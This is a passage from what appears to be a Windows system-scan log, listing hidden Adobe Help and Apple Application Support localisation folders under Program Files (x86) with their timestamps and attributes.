[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ca_es\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\cs_cz\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\da_dk\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\de_de\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\en_us\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\es_es\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\eu_ES\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fi_fi\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\fr_fr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hr_hr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\hu_hu\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\it_it\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ja_jp\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ko_kr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nb_no\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\nl_nl\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pl_pl\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\pt_br\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ro_ro\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\ru_ru\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sk_sk\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sl_si\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\sv_se\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\tr_tr\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\uk_ua\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_cn\reader\X\using
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw\reader
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw\reader\X
[2014/04/08 15:27:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\Help\zh_tw\reader\X\using
[2012/06/20 12:06:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ca_ES
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\cs_CZ
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\da_DK
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\de_DE
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\en_US
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\es_ES
[2012/06/20 12:06:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\eu_ES
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\fi_FI
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\fr_FR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\hr_HR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\hu_HU
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\it_IT
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ja_JP
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ko_KR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\nb_NO
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\nl_NL
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\pl_PL
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\pt_BR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ro_RO
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ru_RU
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\sk_SK
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\sl_SI
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\sv_SE
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\tr_TR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\uk_UA
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\zh_CN
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\zh_TW
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\ColorSync.resources
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CoreGraphics.resources
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\Foundation.resources
[2015/02/04 08:11:07 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaAccessibility.resources
[2015/02/04 08:11:07 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaToolbox.resources
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ar.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ca.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\cs.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\da.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\de.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\el.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\English.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\en_GB.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\es.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\fi.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\fr.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\he.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\hr.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\hu.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\id.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\it.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ja.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ko.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ms.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\nb.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\nl.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\pl.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\pt.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\pt_PT.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ro.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ru.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\sk.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\sv.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\th.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\tr.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\uk.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\vi.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\zh_CN.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\zh_TW.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ar.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ca.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\cs.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\da.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\de.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\el.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\English.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\es.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\fi.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\fr.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\he.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\hr.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\hu.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\id.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\it.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ko.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ms.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\nb.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\nl.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\pl.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\pt.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\pt_PT.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ro.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ru.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\sk.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\sv.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\th.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\tr.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\uk.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\vi.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\zh_CN.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\zh_TW.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\ColorSync.resources\Profiles
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CoreFoundation.resources\en.lproj
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\Foundation.resources\en.lproj
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaAccessibility.resources\en.lproj
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaAccessibility.resources\en_GB.lproj
